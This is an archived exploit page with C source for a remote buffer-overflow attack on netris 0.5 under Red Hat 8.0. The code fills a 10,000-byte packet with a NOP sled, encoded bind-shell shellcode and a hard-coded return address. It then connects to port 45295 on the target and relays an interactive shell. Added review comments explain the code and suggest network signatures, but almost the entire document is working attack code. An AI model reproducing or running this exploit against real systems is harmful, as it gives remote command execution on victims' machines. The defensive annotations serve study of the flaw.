
netris-shash.c

netris-shash.c
Posted Sep 21, 2003
Authored by Shashank Pandey

Remote exploit for netris version 0.5 on RedHat 8.0 that makes use of a buffer overflow vulnerability where a client connecting to an untrusted netris server could be sent an unusually long data packet, which would be copied into a fixed-length buffer without bounds checking.

tags | exploit, remote, overflow
systems | linux, redhat
SHA-256 | f8edfa8276857fffd804744d1421a08844b4eda9116d04980bca6788d879b5db

netris-shash.c

/*
01010101010101010101010101010101010101010101010101010101010101010101010101
0
>>Netris v 0.5 Remote exploit for Red Hat 8.0 1
0
by 1
0
>>Shashank Pandey a.k.a <<=SupaHer0=>> 1
0
(reach_shash [at] linuxmail.org) 1
0
-> Greetz to ma bros : Hi_Tech_Assain , Rafa(leave NASA alone ;-) 1
0
0
-> lol@ that e-security fair in Delhi...... what a joke ! 1
0
-> Love to tha babes in Delhi... j00 r getting bettah and bettah 1
each passing day.... ;-) 0
0
1
0101010101010101010101010101010101010101010101010101010101010101010101010

*/
#include<stdio.h>
#include<stdlib.h>
#include<netdb.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<netinet/in.h>

#include<arpa/inet.h>

/* Size in bytes of the single buffer that main() builds and sends. */
#define MYBUF 10000
/*
 * Hard-coded 32-bit value that main() writes at every 4-byte step of the
 * buffer. The author labels it as specific to Red Hat 8.0; a fixed value
 * like this only fits one particular memory layout of the target binary.
 */
#define RETADDR (0x08050c00+70) // Red Hat 8.0
/* TCP port of the netris peer that main() connects to first. */
#define MYPORT 9284




/* Hie Teso ;-) */

/*
 * Interactive relay between the local terminal and a connected socket.
 *
 * First sends the fixed string in `cmd` over `sock`, then loops forever:
 * data read from fd 0 (stdin) is written to `sock`, and data read from
 * `sock` is written to fd 1 (stdout), up to sizeof(buf) bytes per read.
 *
 * sock: connected stream socket; main() passes the socket it opened to
 *       port 45295.
 *
 * Does not return: the loop has no break, and every termination path
 * calls exit(EXIT_FAILURE) after printing a short status line.
 *
 * Defensive reading: the first bytes sent on the new connection are always
 * the same literal command string, which is a stable artefact of this
 * published sample in a packet capture.
 */
void shell (int sock)
{
int l;
char buf[512];
/* NOTE(review): rfds is declared uninitialised and FD_ZERO is never called
   in this function; only FD_SET is applied to it below. */
fd_set rfds;

char *cmd="/bin/uname -a;id\n";

/* Fixed opening command; the return value of send() is not checked. */
send(sock,cmd,strlen(cmd),0);


while (1)
{
/* Wait (no timeout) until stdin or the socket is readable.
   The return value of select() is not checked. */
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds))
{ l = read (0, buf, sizeof (buf));
/* EOF or error on stdin ends the whole process. */
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}

/* Forward local input to the peer; short writes are not handled. */
write (sock, buf, l);
}

if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
/* 0 means the peer closed the connection; <0 is a read error. */
if (l == 0) {
printf ("\n - Connection closed by remote host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {

printf ("\n - Read failure\n");
exit (EXIT_FAILURE);
}
/* Echo whatever the peer sent to stdout. */
write (1,buf, l); }
}
}



/*
 * Opaque byte string that main() copies into the outgoing buffer, with its
 * length taken from strlen(). The author's own comment describes it as a
 * bind shell on port 45295 credited to "netric", and main() later connects
 * to that same port. The bytes are not decoded or verified here, so treat
 * that description as the author's claim.
 *
 * Defensive reading: the array is a constant, so its byte sequence is a
 * fixed content artefact of this published sample.
 */
static char hellcode[]= /* bindshell(45295)by netric ; wait for mine.. */
"\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26"
"\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95"
"\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28"
"\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
"\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e"
"\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06"
"\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0"
"\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95"
"\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
"\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e"
"\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55"
"\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e";


//who wants to know..who wants to know.. bad men..


/*
 * Entry point of the published proof-of-concept for the netris 0.5 overflow.
 *
 * What the visible code does, in order:
 *   1. requires one argument and converts argv[1] to an IPv4 address with
 *      inet_addr();
 *   2. builds a MYBUF-byte buffer (layout described inline below);
 *   3. opens a TCP connection to MYPORT and sends the whole buffer with a
 *      single send();
 *   4. closes that socket, sleeps one second, then connects to TCP port
 *      45295 on the same address;
 *   5. if that connect succeeds, hands the socket to shell().
 *
 * Returns 0 on every return path; calls exit(0) when no argument is given.
 *
 * Defensive reading: on the wire this is one oversized (MYBUF-byte) message
 * to the netris port, followed about a second later by a new connection to
 * port 45295 on the same host. The accompanying description attributes the
 * flaw to netris copying received data into a fixed-length buffer without a
 * bounds check, so the durable fix is length validation in netris itself
 * (a patched build), not filtering for this one sample. The hard-coded
 * RETADDR ties the sample to one specific build and memory layout.
 */
int main(int argc , char **argv)

{


struct sockaddr_in rem_addr;
struct hostent *h;
/* newfd only receives the return value of send(); sock is never used. */
int i,fd,newfd,sock;

char buffer[MYBUF];

printf("\n================================\n");
printf("\nNetris 0.5 buffer overflow sploit\n");
printf("by Shashank a.k.a <<=SupaHer0=>>\n");
//printf("Usage : %s <I.P.>\n\n" , argv[1]);
printf("\n================================\n");

if(argc<2)
{printf("Usage: %s <I.P.>\n\n" ,argv[0]);
exit(0);}


h=gethostbyname(argv[1]);
/* NOTE(review): the condition assigns NULL to h rather than comparing, so
   this branch is never taken and the lookup result is discarded. The
   address actually used below comes from inet_addr(argv[1]). */
if(h=NULL)

{printf("%s : unknown host %s" , argv[1] );
exit(1);}


rem_addr.sin_family=AF_INET;
rem_addr.sin_addr.s_addr=inet_addr(argv[1]);
rem_addr.sin_port=htons(MYPORT);


/* Pre-fill the buffer with RETADDR at every 4-byte offset.
   presumably built for 32-bit x86, where long is 4 bytes; confirm. */
for(i=0;i<MYBUF;i+=4)

{

*(long *)&buffer[i]=RETADDR;

}

//leave the first 68 bytes alone, they will be turned to zero!
/* Bytes 0..67 are overwritten with the letter 'S'. */
memset(buffer,'S',68);

//lets have a NOP slide ready..
/* Bytes 68..4163 are overwritten with 0x90. */
memset(buffer+68,0x90,4096);

//shellcode
/* hellcode is copied in at offset 4164; the rest of the buffer keeps the
   repeated RETADDR fill from the loop above. */
memcpy(buffer+68+4096,hellcode,strlen(hellcode));



/* First connection: the return values of socket() and connect() are not
   checked, and the whole buffer goes out in one send(). */
fd=socket(AF_INET,SOCK_STREAM,0);

connect(fd,(struct sockaddr *)&rem_addr,sizeof(rem_addr) );

newfd=send(fd,buffer,sizeof(buffer),0);

close(fd);
sleep(1);




/* Second connection: same address, port 45295 (the port named in the
   comment on hellcode). Errors are checked this time. */
rem_addr.sin_family = AF_INET;
rem_addr.sin_addr.s_addr = inet_addr(argv[1]);
rem_addr.sin_port = htons(45295);

if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("- Socket");
return(0);
}

/* A failed connect here is reported as a failed attempt. */
if(connect(fd,(struct sockaddr *)&rem_addr, sizeof(rem_addr)) != 0)
{
printf("- oops! wtf? exploit failed?!.\n");
return(0);
}

printf("--- OH YEAh ! W3 G0T shell :-)..\n\n");



/* shell() never returns, so the return below is not reached on this path. */
shell(fd);

return(0);


//oh..ok.. forgot to tell ya : This C0dE is BS7799 compliant .. ;-)

}